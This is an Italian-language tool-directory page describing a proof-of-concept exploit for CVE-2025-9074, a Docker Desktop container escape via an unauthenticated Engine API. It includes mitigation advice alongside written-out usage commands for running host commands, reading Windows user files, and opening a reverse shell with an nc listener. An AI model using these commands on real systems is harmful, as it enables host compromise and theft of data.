Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — Exploit proof of concept per CVE-2025-9074 - Fuga dal contenitore tramite API Docker Engine non autenticata che interessa Docker Desktop < 4.44.3 su Windows e macOS (CVSS 9.3) | Kitploit
Strumenti/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitPenetration TestingSicurezza CloudRed TeamingEscape dal Container
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-9074-Docker-Desktop-Container-Escape

Exploit proof of concept per CVE-2025-9074 - Fuga dal contenitore tramite API Docker Engine non autenticata che interessa Docker Desktop < 4.44.3 su Windows e macOS (CVSS 9.3)

Vedi Repository
28 mesi faNon ancora revisionato

CVE-2025-9074: Proof of Concept di Fuga dal Contenitore di Docker Desktop

CVE CVSS Platform

Exploit Proof of Concept per CVE-2025-9074 - una vulnerabilità critica di fuga dal contenitore in Docker Desktop che consente l'accesso non autenticato all'API del motore Docker.

Panoramica della Vulnerabilità

ProprietàValore
CVE IDCVE-2025-9074
Punteggio CVSS9.3 (Critico)
Software AffettoDocker Desktop < 4.44.3
Piattaforme AffetteWindows, macOS (Linux non affetto)
Versione CorrettaDocker Desktop 4.44.3+
ScopritoriFelix Boulet, Philippe Dugré
Data di ScopertaMid-2025
Data della PatchAugust 20, 2025

Dettagli Tecnici

La vulnerabilità consente ai container in esecuzione su Docker Desktop di accedere all'API del motore Docker all'indirizzo http://192.168.65.7:2375 senza autenticazione. Ciò si verifica indipendentemente da:

  • Impostazioni di Enhanced Container Isolation (ECI)
  • Configurazione 'Expose daemon on tcp://localhost:2375 without TLS'
  • Qualsiasi altra impostazione di sicurezza

Impatto

  • Windows (backend WSL): Pieno controllo dell'host con privilegi amministrativi
  • macOS: Manipolazione dei container e possibile backdooring (limitato dai prompt utente)
  • Linux: Non vulnerabile (utilizza socket Unix invece di TCP)

Causa Principale

L'API del motore Docker è stata esposta su un socket TCP accessibile dall'interno dei container, consentendo:

  • Creare/eliminare container
  • Montare filesystem dell'host
  • Eseguire comandi privilegiati
  • Bypass completo dell'isolamento dei container

Utilizzo

immagine

Prerequisiti

root@kitploit:~
pip3 install requests

Modalità di Esecuzione dei Comandi

root@kitploit:~
# Execute a command on the host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Read files from Windows host
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# List users on Windows
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

Modalità Reverse Shell

root@kitploit:~
# Terminal 1: Set up listener
nc -lvnp 4444

# Terminal 2: Execute exploit
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# Once connected, host filesystem is at: /hostfs

Dall'interno di un Container

root@kitploit:~
# If you already have access to a container
curl http://192.168.65.7:2375/version

Scenario di Attacco

root@kitploit:~
graph TD
    A[Malicious Container] -->|No Auth Required| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|Create Container| C[Privileged Container]
    C -->|Mount Host FS| D[Full Host Access]
    D -->|Read/Write| E[Compromise System]

Mitigazione

Azione Immediata Richiesta

Aggiorna immediatamente a Docker Desktop 4.44.3 o successivo.

root@kitploit:~
# Check your Docker Desktop version
docker --version

# Update Docker Desktop
# Windows: Download from https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Download from https://desktop.docker.com/mac/main/amd64/Docker.dmg

Soluzioni Alternative (Temporanee)

Se l'aggiornamento immediato non è possibile:

  1. Evita di eseguire container non fidati
  2. Monitora le connessioni di rete dai container
  3. Implementa la segmentazione di rete
  4. Rivedi tutte le immagini dei container prima del deployment

Riferimenti

  • Avviso di Sicurezza Docker
  • NVD CVE-2025-9074
  • Blog di Felix Boulet
  • Analisi di Philippe Dugré
  • Avviso di GitHub

Dichiarazione di non responsabilità

Questo strumento è fornito solo per scopi educativi e di test di sicurezza autorizzati.

  • Utilizzalo solo contro sistemi di tua proprietà o per i quali hai esplicita autorizzazione al test
  • L'accesso non autorizzato ai sistemi informatici è illegale
  • Gli autori non si assumono alcuna responsabilità per l'uso improprio di questo software

Crediti

  • Scoperta della Vulnerabilità: Felix Boulet, Philippe Dugré
  • Sviluppo del PoC: Amanja Francisco
  • Team di Sicurezza Docker: Per la rapida risposta e la patch

Licenza

Licenza MIT - Vedi il file LICENSE per i dettagli

Scarica lo strumento